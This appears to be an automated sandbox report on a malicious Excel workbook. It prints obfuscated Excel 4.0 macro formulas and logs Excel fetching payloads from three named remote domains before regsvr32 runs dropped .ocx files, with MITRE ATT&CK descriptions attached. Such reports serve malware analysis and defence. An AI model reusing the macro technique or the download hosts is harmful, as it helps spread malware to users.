SHA512:	ca0fb9713e25d2c3f1fa312c9318801ee7f97d4f0873501bd05de98bc0dc25020d7ae5f7fd88368dcbdc261c4a4d86a9ccc4c376ae85a014945b4cc7f572cb5d
SSDEEP:	3072:LKpb8rGYrMPe3q7Q0XV5xtezEsi8/dgRJyVceeiE/RzPQUu/zLOQj:LKpb8rGYrMPe3q7Q0XV5xtuEsi8/dgzE
File Content Preview:	........................>......................................................................................................................................................................................................................................

File Icon


Icon Hash:	e4eea286a4b4bcb4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "counter-1248368226.xls"

Indicators
Has Summary Info:	True
Application Name:	Microsoft Excel
Encrypted Document:	False
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	True

Summary
Code Page:	1251
Author:
Last Saved By:
Create Time:	2015-06-05 18:19:34
Last Saved Time:	2021-11-30 06:43:37
Creating Application:	Microsoft Excel
Security:	0

Document Summary
Document Code Page:	1251
Thumbnail Scaling Desired:	False
Company:
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	1048576

Streams

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.436875318248
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . 8 . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S b r b u k 1 . . . . . S b o r 2 . . . . . S b 1 2 1 1 o r 1 . . . . . S h e e t . . . . . B o r 1 . . . . . B
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 38 01 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 f8 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.279171118094
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ? R , . . . . @ . . . . 2 9 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 121786

General
Stream Path:	Workbook
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	121786
Entropy:	6.60410896716
Base64 Encoded:	True
Data ASCII:	. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . . . 4 . < . 8 . = . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . V e 1 8 . . . . . . . X . @ . . . . .
Data Raw:	09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 01 10 04 34 04 3c 04 38 04 3d 04 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

Macro 4.0 Code

2,6,=
9,2,=CHAR(Sbrbuk1!G26)

1,5,=CHAR(Sbrbuk1!R27)
12,1,e

15,6,=FORMULA(Bor1!C8,Bor2!B12)=FORMULA(Bor2!H4,Bor3!G3)=FORMULA(Bor3!C10,Bor4!A2)=FORMULA(Bor4!F9,Bor5!C12)=FORMULA(Bor5!J5,Bor6!B13)=FORMULA(Bor6!F2,Bor1!I3)=FORMULA(Bor3!G3&Bor1!I3&Bor4!A2&Bor5!C12&Bor5!C12&Sb1211or1!B7&Bor2!B12&Sb1211or1!E1&Bor2!B12&Sb1211or1!C13&Bor2!B12&Sb1211or1!A2&Bor2!B12&Sb1211or1!D4&Bor1!I3&Sb1211or1!A11&Bor1!I3&Sb1211or1!F7,G35)=FORMULA(Bor3!G3&Bor1!I3&Bor4!A2&Bor5!C12&Bor5!C12&Sb1211or1!I3&Bor2!B12&Sb1211or1!H10&Sb1211or1!K1&Bor6!B13&Sb1211or1!J8&Bor1!I3&Bor1!I3&Sbor2!B10&Bor1!I3&Sbor2!E2,G37)=FORMULA(Bor3!G3&Bor1!I3&Bor4!A2&Bor5!C12&Bor5!C12&Sb1211or1!I3&Bor2!B12&Sb1211or1!H10&Sb1211or1!K1&Bor6!B13&Sb1211or1!J8&Bor1!I3&Bor1!I3&Sbor2!J5&Bor1!I3&Sbor2!S5,G39)=FORMULA(Bor3!G3&Bor1!I3&Bor4!A2&Bor5!C12&Bor5!C12&Sb1211or1!I3&Bor2!B12&Sb1211or1!H10&Sb1211or1!K1&Bor6!B13&Sb1211or1!J8&Bor1!I3&Bor1!I3&Sbor2!G8&Bor1!I3&Sbor2!P3,G41)=FORMULA(Bor3!G3&Bor1!I3&Bor4!A2&Bor5!C12&Bor5!C12&Sb1211or1!O3&Bor6!B13&Sb1211or1!N6&Bor6!B13&Sb1211or1!Q2&Bor1!I3&Bor1!I3&Bor1!I3&Sbor2!M1&Bor6!B13&Sbor2!H16&Bor2!B12&Sb1211or1!P12&Bor2!B12&Sb1211or1!T1&Bor1!I3&Sbor2!O10,G43)=FORMULA(Bor3!G3&Bor1!I3&Bor4!A2&Bor5!C12&Bor5!C12&Sb1211or1!O3&Bor6!B13&Sb1211or1!N6&Bor6!B13&Sb1211or1!Q2&Bor1!I3&Bor1!I3&Bor1!I3&Sbor2!M1&Bor6!B13&Sbor2!H16&Bor2!B12&Sb1211or1!P12&Bor2!B12&Sb1211or1!T1&Bor1!I3&Sbor2!D14,G45)=FORMULA(Bor3!G3&Bor1!I3&Bor4!A2&Bor5!C12&Bor5!C12&Sb1211or1!O3&Bor6!B13&Sb1211or1!N6&Bor6!B13&Sb1211or1!Q2&Bor1!I3&Bor1!I3&Bor1!I3&Sbor2!M1&Bor6!B13&Sbor2!H16&Bor2!B12&Sb1211or1!P12&Bor2!B12&Sb1211or1!T1&Bor1!I3&Sbor2!L12,G47)=FORMULA(Bor3!G3&Sbrbuk1!M38&Sbrbuk1!M40&Sbrbuk1!M42&Sbrbuk1!M44&Sbrbuk1!M38&Sbrbuk1!L46,G49)

3,7,=CHAR(Sbrbuk1!E31)
11,1,r

2,8,C
7,2,=CHAR(Sbrbuk1!S32)

1,0,A
8,5,=CHAR(Sbrbuk1!J25)

4,9,=CHAR(Sbrbuk1!N29)
11,2,L

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 2, 2021 14:27:48.815012932 CET	49167	443	192.168.2.22	108.179.192.98
Dec 2, 2021 14:27:48.815061092 CET	443	49167	108.179.192.98	192.168.2.22
Dec 2, 2021 14:27:48.815136909 CET	49167	443	192.168.2.22	108.179.192.98
Dec 2, 2021 14:27:48.834758997 CET	49167	443	192.168.2.22	108.179.192.98
Dec 2, 2021 14:27:48.834789991 CET	443	49167	108.179.192.98	192.168.2.22
Dec 2, 2021 14:27:49.130497932 CET	443	49167	108.179.192.98	192.168.2.22
Dec 2, 2021 14:27:49.130671024 CET	49167	443	192.168.2.22	108.179.192.98
Dec 2, 2021 14:27:49.138658047 CET	49167	443	192.168.2.22	108.179.192.98
Dec 2, 2021 14:27:49.138676882 CET	443	49167	108.179.192.98	192.168.2.22
Dec 2, 2021 14:27:49.138988018 CET	443	49167	108.179.192.98	192.168.2.22
Dec 2, 2021 14:27:49.139046907 CET	49167	443	192.168.2.22	108.179.192.98
Dec 2, 2021 14:27:49.404555082 CET	49167	443	192.168.2.22	108.179.192.98
Dec 2, 2021 14:27:49.444869041 CET	443	49167	108.179.192.98	192.168.2.22
Dec 2, 2021 14:27:50.427690983 CET	443	49167	108.179.192.98	192.168.2.22
Dec 2, 2021 14:27:50.427912951 CET	49167	443	192.168.2.22	108.179.192.98
Dec 2, 2021 14:27:50.428333998 CET	443	49167	108.179.192.98	192.168.2.22
Dec 2, 2021 14:27:50.428417921 CET	49167	443	192.168.2.22	108.179.192.98
Dec 2, 2021 14:27:50.428445101 CET	443	49167	108.179.192.98	192.168.2.22
Dec 2, 2021 14:27:50.428507090 CET	49167	443	192.168.2.22	108.179.192.98
Dec 2, 2021 14:27:50.775552034 CET	49168	443	192.168.2.22	103.28.36.171
Dec 2, 2021 14:27:50.775589943 CET	443	49168	103.28.36.171	192.168.2.22
Dec 2, 2021 14:27:50.775661945 CET	49168	443	192.168.2.22	103.28.36.171
Dec 2, 2021 14:27:50.776443005 CET	49168	443	192.168.2.22	103.28.36.171
Dec 2, 2021 14:27:50.776457071 CET	443	49168	103.28.36.171	192.168.2.22
Dec 2, 2021 14:27:51.212392092 CET	443	49168	103.28.36.171	192.168.2.22
Dec 2, 2021 14:27:51.212614059 CET	49168	443	192.168.2.22	103.28.36.171
Dec 2, 2021 14:27:51.229142904 CET	49168	443	192.168.2.22	103.28.36.171
Dec 2, 2021 14:27:51.229171038 CET	443	49168	103.28.36.171	192.168.2.22
Dec 2, 2021 14:27:51.229562998 CET	443	49168	103.28.36.171	192.168.2.22
Dec 2, 2021 14:27:51.229680061 CET	49168	443	192.168.2.22	103.28.36.171
Dec 2, 2021 14:27:51.253412962 CET	49168	443	192.168.2.22	103.28.36.171
Dec 2, 2021 14:27:51.296864986 CET	443	49168	103.28.36.171	192.168.2.22
Dec 2, 2021 14:27:52.888289928 CET	443	49168	103.28.36.171	192.168.2.22
Dec 2, 2021 14:27:52.888381958 CET	443	49168	103.28.36.171	192.168.2.22
Dec 2, 2021 14:27:52.888463020 CET	49168	443	192.168.2.22	103.28.36.171
Dec 2, 2021 14:27:52.888484001 CET	49168	443	192.168.2.22	103.28.36.171
Dec 2, 2021 14:27:52.888760090 CET	49168	443	192.168.2.22	103.28.36.171
Dec 2, 2021 14:27:52.888778925 CET	443	49168	103.28.36.171	192.168.2.22
Dec 2, 2021 14:27:52.888814926 CET	49168	443	192.168.2.22	103.28.36.171
Dec 2, 2021 14:27:52.888840914 CET	49168	443	192.168.2.22	103.28.36.171
Dec 2, 2021 14:27:53.090956926 CET	49169	443	192.168.2.22	162.241.2.78
Dec 2, 2021 14:27:53.091001987 CET	443	49169	162.241.2.78	192.168.2.22
Dec 2, 2021 14:27:53.091089010 CET	49169	443	192.168.2.22	162.241.2.78
Dec 2, 2021 14:27:53.091763020 CET	49169	443	192.168.2.22	162.241.2.78
Dec 2, 2021 14:27:53.091774940 CET	443	49169	162.241.2.78	192.168.2.22
Dec 2, 2021 14:27:53.397407055 CET	443	49169	162.241.2.78	192.168.2.22
Dec 2, 2021 14:27:53.397496939 CET	49169	443	192.168.2.22	162.241.2.78
Dec 2, 2021 14:27:53.409763098 CET	49169	443	192.168.2.22	162.241.2.78
Dec 2, 2021 14:27:53.409776926 CET	443	49169	162.241.2.78	192.168.2.22
Dec 2, 2021 14:27:53.410053968 CET	443	49169	162.241.2.78	192.168.2.22
Dec 2, 2021 14:27:53.410108089 CET	49169	443	192.168.2.22	162.241.2.78
Dec 2, 2021 14:27:53.414730072 CET	49169	443	192.168.2.22	162.241.2.78
Dec 2, 2021 14:27:53.456875086 CET	443	49169	162.241.2.78	192.168.2.22
Dec 2, 2021 14:27:54.829169035 CET	443	49169	162.241.2.78	192.168.2.22
Dec 2, 2021 14:27:54.829310894 CET	49169	443	192.168.2.22	162.241.2.78
Dec 2, 2021 14:27:54.829492092 CET	443	49169	162.241.2.78	192.168.2.22
Dec 2, 2021 14:27:54.829557896 CET	49169	443	192.168.2.22	162.241.2.78
Dec 2, 2021 14:27:54.829592943 CET	443	49169	162.241.2.78	192.168.2.22
Dec 2, 2021 14:27:54.829647064 CET	49169	443	192.168.2.22	162.241.2.78
Dec 2, 2021 14:27:54.836184978 CET	49169	443	192.168.2.22	162.241.2.78
Dec 2, 2021 14:27:54.836224079 CET	443	49169	162.241.2.78	192.168.2.22
Dec 2, 2021 14:27:54.836234093 CET	49169	443	192.168.2.22	162.241.2.78
Dec 2, 2021 14:27:54.836278915 CET	49169	443	192.168.2.22	162.241.2.78
Dec 2, 2021 14:29:48.541444063 CET	49167	443	192.168.2.22	108.179.192.98
Dec 2, 2021 14:29:48.543826103 CET	49167	443	192.168.2.22	108.179.192.98

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 2, 2021 14:27:48.784358025 CET	52167	53	192.168.2.22	8.8.8.8
Dec 2, 2021 14:27:48.804148912 CET	53	52167	8.8.8.8	192.168.2.22
Dec 2, 2021 14:27:50.456291914 CET	50591	53	192.168.2.22	8.8.8.8
Dec 2, 2021 14:27:50.773180962 CET	53	50591	8.8.8.8	192.168.2.22
Dec 2, 2021 14:27:52.924587011 CET	57805	53	192.168.2.22	8.8.8.8
Dec 2, 2021 14:27:53.086635113 CET	53	57805	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Dec 2, 2021 14:27:48.784358025 CET	192.168.2.22	8.8.8.8	0x3c72	Standard query (0)	greenflag.esp.br	A (IP address)	IN (0x0001)
Dec 2, 2021 14:27:50.456291914 CET	192.168.2.22	8.8.8.8	0x6c3	Standard query (0)	noithat117.vn	A (IP address)	IN (0x0001)
Dec 2, 2021 14:27:52.924587011 CET	192.168.2.22	8.8.8.8	0x313b	Standard query (0)	playsis.com.br	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Dec 2, 2021 14:27:48.804148912 CET	8.8.8.8	192.168.2.22	0x3c72	No error (0)	greenflag.esp.br	108.179.192.98	A (IP address)	IN (0x0001)
Dec 2, 2021 14:27:50.773180962 CET	8.8.8.8	192.168.2.22	0x6c3	No error (0)	noithat117.vn	103.28.36.171	A (IP address)	IN (0x0001)
Dec 2, 2021 14:27:53.086635113 CET	8.8.8.8	192.168.2.22	0x313b	No error (0)	playsis.com.br	162.241.2.78	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

greenflag.esp.br

noithat117.vn

playsis.com.br

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49167	108.179.192.98	443	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp	kBytes transferred	Direction	Data
2021-12-02 13:27:49 UTC	0	OUT	GET /yuINdRbM/tiynh.html HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: greenflag.esp.br Connection: Keep-Alive
2021-12-02 13:27:50 UTC	0	IN	HTTP/1.1 200 OK Date: Thu, 02 Dec 2021 13:27:49 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49168	103.28.36.171	443	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp	kBytes transferred	Direction	Data
2021-12-02 13:27:51 UTC	0	OUT	GET /TSh7GBeIR/tiynh.html HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: noithat117.vn Connection: Keep-Alive
2021-12-02 13:27:52 UTC	0	IN	HTTP/1.1 200 OK Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 0 Date: Thu, 02 Dec 2021 13:27:52 GMT Server: LiteSpeed Alt-Svc: quic=":443"; ma=2592000; v="43,46", h3-Q043=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-25=":443"; ma=2592000, h3-27=":443"; ma=2592000

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.22	49169	162.241.2.78	443	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp	kBytes transferred	Direction	Data
2021-12-02 13:27:53 UTC	1	OUT	GET /qJSL1BN5V/tiynh.html HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: playsis.com.br Connection: Keep-Alive
2021-12-02 13:27:54 UTC	1	IN	HTTP/1.1 200 OK Date: Thu, 02 Dec 2021 13:27:53 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Content-Length: 0 Content-Type: text/html; charset=UTF-8

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 2804 Parent PID: 596

General

Start time:	14:27:17
Start date:	02/12/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Imagebase:	0x13f870000
File size:	28253536 bytes
MD5 hash:	D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: regsvr32.exe PID: 2116 Parent PID: 2804

General

Start time:	14:27:28
Start date:	02/12/2021
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\regsvr32.exe" C:\Datop\besta.ocx
Imagebase:	0xff9c0000
File size:	19456 bytes
MD5 hash:	59BCE9F07985F8A4204F4D6554CFF708
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: regsvr32.exe PID: 2920 Parent PID: 2804

General

Start time:	14:27:28
Start date:	02/12/2021
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\regsvr32.exe" C:\Datop\bestb.ocx
Imagebase:	0xff9c0000
File size:	19456 bytes
MD5 hash:	59BCE9F07985F8A4204F4D6554CFF708
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: regsvr32.exe PID: 1136 Parent PID: 2804

General

Start time:	14:27:29
Start date:	02/12/2021
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\regsvr32.exe" C:\Datop\bestc.ocx
Imagebase:	0xff9c0000
File size:	19456 bytes
MD5 hash:	59BCE9F07985F8A4204F4D6554CFF708
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Disassembly

Code Analysis

Reset < >

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report counter-1248368226.xls

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Initial Sample

Dropped Files

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

System Summary:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

HIPS / PFW / Operating System Protection Evasion:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "counter-1248368226.xls"

Indicators

Summary

Document Summary

Streams

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096

General

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 121786

General

Macro 4.0 Code

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets